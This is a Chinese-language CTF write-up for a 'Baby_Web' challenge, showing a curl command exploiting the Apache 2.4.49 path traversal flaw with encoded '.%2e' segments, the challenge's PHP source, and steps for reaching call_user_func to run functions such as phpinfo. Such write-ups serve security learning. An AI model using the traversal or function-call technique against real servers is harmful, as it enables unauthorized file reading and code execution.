Baby_Web
查看源码发现
<!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?-->
然后抓包看中间件,Apache/2.4.49 (Unix) 存在目录穿越漏洞
curl http://node4.anna.nssctf.cn:28805/cgi-bin/.%2e/.%2e/.%2e/.%2e/var/www/index .php.txt
index.php
<?php
error_reporting(0);
define("main","main");
include "Class.php";
$temp = new Temp($_POST);
$temp->display($_GET['filename']);
?>
继续读取Class.php
<?php
defined('main') or die("no!!");
Class Temp{
private $date=['version'=>'1.0','img'=>'https://www.apache.org/img/asf-estd-1999-logo.jpg'];
private $template;
public function __construct($data){
$this->date = array_merge($this->date,$data);
}
public function getTempName($template,$dir){
if($dir === 'admin'){
$this->template = str_replace('..','','./template/admin/'.$template);
if(!is_file($this->template)){
die("no!!");
}
}
else{
$this->template = './template/index.html';
}
}
public function display($template,$space=''){
extract($this->date);
$this->getTempName($template,$space);
include($this->template);
}
public function listdata($_params){
$system = [
'db' => '',
'app' => '',
'num' => '',
'sum' => '',
'form' => '',
'page' => '',
'site' => '',
'flag' => '',
'not_flag' => '',
'show_flag' => '',
'more' => '',
'catid' => '',
'field' => '',
'order' => '',
'space' => '',
'table' => '',
'table_site' => '',
'total' => '',
'join' => '',
'on' => '',
'action' => '',
'return' => '',
'sbpage' => '',
'module' => '',
'urlrule' => '',
'pagesize' => '',
'pagefile' => '',
];
$param = $where = [];
$_params = trim($_params);
$params = explode(' ', $_params);
if (in_array($params[0], ['list','function'])) {
$params[0] = 'action='.$params[0];
}
foreach ($params as $t) {
$var = substr($t, 0, strpos($t, '='));
$val = substr($t, strpos($t, '=') + 1);
if (!$var) {
continue;
}
if (isset($system[$var])) {
$system[$var] = $val;
} else {
$param[$var] = $val;
}
}
// action
switch ($system['action']) {
case 'function':
if (!isset($param['name'])) {
return 'hacker!!';
} elseif (!function_exists($param['name'])) {
return 'hacker!!';
}
$force = $param['force'];
if (!$force) {
$p = [];
foreach ($param as $var => $t) {
if (strpos($var, 'param') === 0) {
$n = intval(substr($var, 5));
$p[$n] = $t;
}
}
if ($p) {
$rt = call_user_func_array($param['name'], $p);
} else {
$rt = call_user_func($param['name']);
}
return $rt;
}else{
return null;
}
case 'list':
return json_encode($this->date);
}
return null;
}
}/template/admin/ 首先代码中有这一个目录,访问看一下是啥
发现会调用listdata方法并且需要我们传参 action module
if($dir === 'admin'){
$this->template = str_replace('..','','./template/admin/'.$template);
template需要就是传进去index.html,这样才会调用listdata这个方法
$dir需要是admin,是space传进来的,所以space=admin
template也就是filename需要是 index.html
action需要是function
module也就是mod 赋值
force存在随便赋值就行
$force = $param['force'];
if (!$force) {
利用call_user_func显示环境变量。
这里action=function name=phpinfo是因为数组是以空格为分隔的。
方法二、利用call_user_func_array
$rt = call_user_func_array($param['name'], $p);
则需要满足 $p存在也就是,
foreach ($param as $var => $t) {
if (strpos($var, 'param') === 0) {
$n = intval(substr($var, 5));
$p[$n] = $t ;
}
在这里需要一个键和值,
结束!
